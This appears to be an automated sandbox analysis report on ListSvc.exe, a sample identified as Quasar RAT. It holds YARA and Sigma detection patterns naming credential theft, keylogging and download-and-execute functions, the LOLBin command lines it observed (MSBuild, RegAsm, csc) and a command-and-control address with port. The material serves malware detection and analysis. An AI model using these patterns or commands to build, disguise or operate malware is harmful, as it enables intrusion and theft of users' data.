6.2.MSBuild.exe.5120000.3.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x40055:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x40225:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
6.2.MSBuild.exe.5120000.3.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4251d:$x2: Process already elevated. 0x342a0:$x4: get_encryptedPassword 0x360e5:$x5: DoDownloadAndExecute
6.2.MSBuild.exe.5120000.3.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
25.2.MSBuild.exe.5450000.3.raw.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x3697a:$x3: GetKeyloggerLogsResponse 0x35c51:$x4: GetKeyloggerLogs 0x35eea:$s1: <RunHidden>k__BackingField 0x36b42:$s2: set_SystemInfos 0x35f13:$s3: set_RunHidden 0x35aa6:$s4: set_RemotePath 0x47a28:$s6: Client.exe 0x47abc:$s6: Client.exe 0x30971:$s7: xClient.Core.ReverseProxy.Packets
25.2.MSBuild.exe.5450000.3.raw.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x2f783:$x4: xClient.Properties.Resources.resources 0x2f621:$s4: Client.exe 0x35f13:$s7: set_RunHidden
25.2.MSBuild.exe.5450000.3.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x35ed7:$s1: DoUploadAndExecute 0x360e5:$s2: DoDownloadAndExecute 0x35cdb:$s3: DoShellExecute 0x360aa:$s4: set_Processname 0x6bc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x6aec:$op2: 00 17 03 1F 20 17 19 15 28 0x7552:$op3: 00 04 03 69 91 1B 40 0x7da2:$op3: 00 04 03 69 91 1B 40
25.2.MSBuild.exe.5450000.3.raw.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3697a:$x1: GetKeyloggerLogsResponse 0x36bba:$s1: DoShellExecuteResponse 0x36533:$s2: GetPasswordsResponse 0x36a8d:$s3: GetStartupItemsResponse 0x35eeb:$s5: RunHidden 0x35f09:$s5: RunHidden 0x35f17:$s5: RunHidden 0x35f2b:$s5: RunHidden
25.2.MSBuild.exe.5450000.3.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x40055:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x40225:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
25.2.MSBuild.exe.5450000.3.raw.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4251d:$x2: Process already elevated. 0x342a0:$x4: get_encryptedPassword 0x360e5:$x5: DoDownloadAndExecute
25.2.MSBuild.exe.5450000.3.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
38.2.RegAsm.exe.400000.0.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x3697a:$x3: GetKeyloggerLogsResponse 0x35c51:$x4: GetKeyloggerLogs 0x35eea:$s1: <RunHidden>k__BackingField 0x36b42:$s2: set_SystemInfos 0x35f13:$s3: set_RunHidden 0x35aa6:$s4: set_RemotePath 0x47a28:$s6: Client.exe 0x47abc:$s6: Client.exe 0x30971:$s7: xClient.Core.ReverseProxy.Packets
38.2.RegAsm.exe.400000.0.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x2f783:$x4: xClient.Properties.Resources.resources 0x2f621:$s4: Client.exe 0x35f13:$s7: set_RunHidden
38.2.RegAsm.exe.400000.0.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x35ed7:$s1: DoUploadAndExecute 0x360e5:$s2: DoDownloadAndExecute 0x35cdb:$s3: DoShellExecute 0x360aa:$s4: set_Processname 0x6bc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x6aec:$op2: 00 17 03 1F 20 17 19 15 28 0x7552:$op3: 00 04 03 69 91 1B 40 0x7da2:$op3: 00 04 03 69 91 1B 40
38.2.RegAsm.exe.400000.0.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x3697a:$x1: GetKeyloggerLogsResponse 0x36bba:$s1: DoShellExecuteResponse 0x36533:$s2: GetPasswordsResponse 0x36a8d:$s3: GetStartupItemsResponse 0x35eeb:$s5: RunHidden 0x35f09:$s5: RunHidden 0x35f17:$s5: RunHidden 0x35f2b:$s5: RunHidden
38.2.RegAsm.exe.400000.0.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x40055:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x40225:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
38.2.RegAsm.exe.400000.0.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4251d:$x2: Process already elevated. 0x342a0:$x4: get_encryptedPassword 0x360e5:$x5: DoDownloadAndExecute
38.2.RegAsm.exe.400000.0.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
25.2.MSBuild.exe.3ae26f8.1.unpack	Vermin_Keylogger_Jan18_1	Detects Vermin Keylogger	Florian Roth	0x34b7a:$x3: GetKeyloggerLogsResponse 0x33e51:$x4: GetKeyloggerLogs 0x340ea:$s1: <RunHidden>k__BackingField 0x34d42:$s2: set_SystemInfos 0x34113:$s3: set_RunHidden 0x33ca6:$s4: set_RemotePath 0x45c28:$s6: Client.exe 0x45cbc:$s6: Client.exe 0x2eb71:$s7: xClient.Core.ReverseProxy.Packets
25.2.MSBuild.exe.3ae26f8.1.unpack	xRAT_1	Detects Patchwork malware	Florian Roth	0x2d983:$x4: xClient.Properties.Resources.resources 0x2d821:$s4: Client.exe 0x34113:$s7: set_RunHidden
25.2.MSBuild.exe.3ae26f8.1.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x340d7:$s1: DoUploadAndExecute 0x342e5:$s2: DoDownloadAndExecute 0x33edb:$s3: DoShellExecute 0x342aa:$s4: set_Processname 0x4dc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x4cec:$op2: 00 17 03 1F 20 17 19 15 28 0x5752:$op3: 00 04 03 69 91 1B 40 0x5fa2:$op3: 00 04 03 69 91 1B 40
25.2.MSBuild.exe.3ae26f8.1.unpack	Quasar_RAT_2	Detects Quasar RAT	Florian Roth	0x34b7a:$x1: GetKeyloggerLogsResponse 0x34dba:$s1: DoShellExecuteResponse 0x34733:$s2: GetPasswordsResponse 0x34c8d:$s3: GetStartupItemsResponse 0x340eb:$s5: RunHidden 0x34109:$s5: RunHidden 0x34117:$s5: RunHidden 0x3412b:$s5: RunHidden
25.2.MSBuild.exe.3ae26f8.1.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x3e255:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x3e425:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
25.2.MSBuild.exe.3ae26f8.1.unpack	CN_disclosed_20180208_KeyLogger_1	Detects malware from disclosed CN malware set	Florian Roth	0x4071d:$x2: Process already elevated. 0x324a0:$x4: get_encryptedPassword 0x342e5:$x5: DoDownloadAndExecute
25.2.MSBuild.exe.3ae26f8.1.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
25.2.MSBuild.exe.3ae26f8.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x35ed7:$s1: DoUploadAndExecute 0x360e5:$s2: DoDownloadAndExecute 0x35cdb:$s3: DoShellExecute 0x360aa:$s4: set_Processname 0x6bc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x6aec:$op2: 00 17 03 1F 20 17 19 15 28 0x7552:$op3: 00 04 03 69 91 1B 40 0x7da2:$op3: 00 04 03 69 91 1B 40
25.2.MSBuild.exe.3ae26f8.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x40055:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x40225:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
25.2.MSBuild.exe.3ae26f8.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
6.2.MSBuild.exe.37926f8.0.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0x35ed7:$s1: DoUploadAndExecute 0x360e5:$s2: DoDownloadAndExecute 0x35cdb:$s3: DoShellExecute 0x360aa:$s4: set_Processname 0x6bc8:$op1: 04 1E FE 02 04 16 FE 01 60 0x6aec:$op2: 00 17 03 1F 20 17 19 15 28 0x7552:$op3: 00 04 03 69 91 1B 40 0x7da2:$op3: 00 04 03 69 91 1B 40
6.2.MSBuild.exe.37926f8.0.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0x40055:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0x40225:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
6.2.MSBuild.exe.37926f8.0.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
25.2.MSBuild.exe.3a4f8b8.0.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xc8d17:$s1: DoUploadAndExecute 0xc8f25:$s2: DoDownloadAndExecute 0xc8b1b:$s3: DoShellExecute 0xc8eea:$s4: set_Processname 0x99a08:$op1: 04 1E FE 02 04 16 FE 01 60 0x9992c:$op2: 00 17 03 1F 20 17 19 15 28 0x9a392:$op3: 00 04 03 69 91 1B 40 0x9abe2:$op3: 00 04 03 69 91 1B 40
25.2.MSBuild.exe.3a4f8b8.0.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xd2e95:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0xd3065:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
25.2.MSBuild.exe.3a4f8b8.0.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
6.2.MSBuild.exe.36ff8b8.1.raw.unpack	Quasar_RAT_1	Detects Quasar RAT	Florian Roth	0xc8d17:$s1: DoUploadAndExecute 0xc8f25:$s2: DoDownloadAndExecute 0xc8b1b:$s3: DoShellExecute 0xc8eea:$s4: set_Processname 0x99a08:$op1: 04 1E FE 02 04 16 FE 01 60 0x9992c:$op2: 00 17 03 1F 20 17 19 15 28 0x9a392:$op3: 00 04 03 69 91 1B 40 0x9abe2:$op3: 00 04 03 69 91 1B 40
6.2.MSBuild.exe.36ff8b8.1.raw.unpack	MAL_QuasarRAT_May19_1	Detects QuasarRAT malware	Florian Roth	0xd2e95:$xc1: 41 00 64 00 6D 00 69 00 6E 00 00 11 73 00 63 00 68 00 74 00 61 00 73 00 6B 00 73 00 00 1B 2F 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 2F 00 74 00 6E 00 20 00 22 00 00 27 22 00 20 00 2F 00 ... 0xd3065:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
6.2.MSBuild.exe.36ff8b8.1.raw.unpack	JoeSecurity_Quasar	Yara detected Quasar RAT	Joe Security
Click to see the 63 entries

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 'C:\Users\user\AppData\Roaming\ListSvc.url', ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 6408, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 6340

Sigma detected: Suspicious Csc.exe Source File Folder

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' 'C:\Users\user\AppData\Roaming\ListSvc.url', ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 6408, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.cmdline', ProcessId: 6752

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' '/toolsversion:3.5 /version /nologo /val /noconlog /verbosity:quiet', CommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' '/toolsversion:3.5 /version /nologo /val /noconlog /verbosity:quiet', CommandLine|base64offset|contains: *', Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp' /SL5='$50392,1447979,821248,C:\Users\user\Desktop\ListSvc.exe' /VERYSILENT, ParentImage: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp, ParentProcessId: 6368, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe' '/toolsversion:3.5 /version /nologo /val /noconlog /verbosity:quiet', ProcessId: 6392

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.dll	Avira: detection malicious, Label: HEUR/AGEN.1138338
Source: C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.dll	Avira: detection malicious, Label: HEUR/AGEN.1138338

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3ae26f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.37926f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3a4f8b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.36ff8b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.557407404.000000000386A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6344, type: MEMORYSTR

Multi AV Scanner detection for submitted file

Show sources

Source: ListSvc.exe	Virustotal: Detection: 54%	Perma Link
Source: ListSvc.exe	Metadefender: Detection: 29%	Perma Link
Source: ListSvc.exe	ReversingLabs: Detection: 71%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.dll

Joe Sandbox ML: detected

Source: ListSvc.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED

Source: ListSvc.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: H,pc:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.pdb source: csc.exe, 0000000D.00000003.393848879.000000000091D000.00000004.00000001.sdmp
Source:	Binary string: atxm53jg.pdb source: MSBuild.exe, 00000006.00000002.442341653.0000000002553000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.pdbX source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp
Source:	Binary string: m:C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.pdb source: MSBuild.exe, 00000006.00000002.442341653.0000000002553000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.pdbX source: MSBuild.exe, 00000019.00000002.563212292.00000000053E0000.00000004.00020000.sdmp
Source:	Binary string: m:C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.pdb(@ source: MSBuild.exe, 00000006.00000002.442341653.0000000002553000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.pdb source: MSBuild.exe, 00000019.00000002.563212292.00000000053E0000.00000004.00020000.sdmp, csc.exe, 0000001E.00000003.500074692.000000000DB91000.00000004.00000001.sdmp
Source:	Binary string: applaunch.pdb source: AppLaunch.exe, 00000008.00000000.364620319.00000000010F1000.00000020.00020000.sdmp
Source:	Binary string: wukkzmi2.pdb source: MSBuild.exe, 00000019.00000002.556425095.00000000028A2000.00000004.00000001.sdmp
Source:	Binary string: c:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.pdb source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, csc.exe, 0000000D.00000003.393612970.000000000D631000.00000004.00000001.sdmp
Source:	Binary string: m:C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.pdb source: MSBuild.exe, 00000019.00000002.556425095.00000000028A2000.00000004.00000001.sdmp

Source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp	Binary or memory string: autorun.inf.exe
Source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp	Binary or memory string: [AutoRun]
Source: RegAsm.exe, 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp	Binary or memory string: autorun.inf.exe
Source: RegAsm.exe, 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp	Binary or memory string: [AutoRun]
Source: MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp	Binary or memory string: autorun.inf.exe
Source: MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp	Binary or memory string: [AutoRun]
Source: RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Binary or memory string: autorun.inf.exe
Source: RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	Binary or memory string: [AutoRun]

Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_0040AEF4 FindFirstFileW,FindClose,	0_2_0040AEF4
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 0_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	0_2_0040A928
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_0060C2B0 FindFirstFileW,GetLastError,	1_2_0060C2B0
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_0040E6A0 FindFirstFileW,FindClose,	1_2_0040E6A0
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	1_2_0040E0D4
Source: C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	Code function: 1_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,	1_2_006B8DE4
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 2_2_0040AEF4 FindFirstFileW,FindClose,	2_2_0040AEF4
Source: C:\Users\user\Desktop\ListSvc.exe	Code function: 2_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	2_2_0040A928
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_0060C2B0 FindFirstFileW,GetLastError,	3_2_0060C2B0
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_0040E6A0 FindFirstFileW,FindClose,	3_2_0040E6A0
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	3_2_0040E0D4
Source: C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	Code function: 3_2_006B8DE4 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,	3_2_006B8DE4

Networking:

May check the online IP address of the machine

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

DNS query: name: ip-api.com

Source: global traffic

HTTP traffic detected: GET /json/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0Host: ip-api.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.2.6:49760 -> 89.38.99.64:222

Source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://api.ipify.org/
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: http://crt.se1p
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://freegeoip.net/xml/
Source: RegAsm.exe, 00000017.00000002.620101519.0000000003242000.00000004.00000001.sdmp	String found in binary or memory: http://ip-api.com
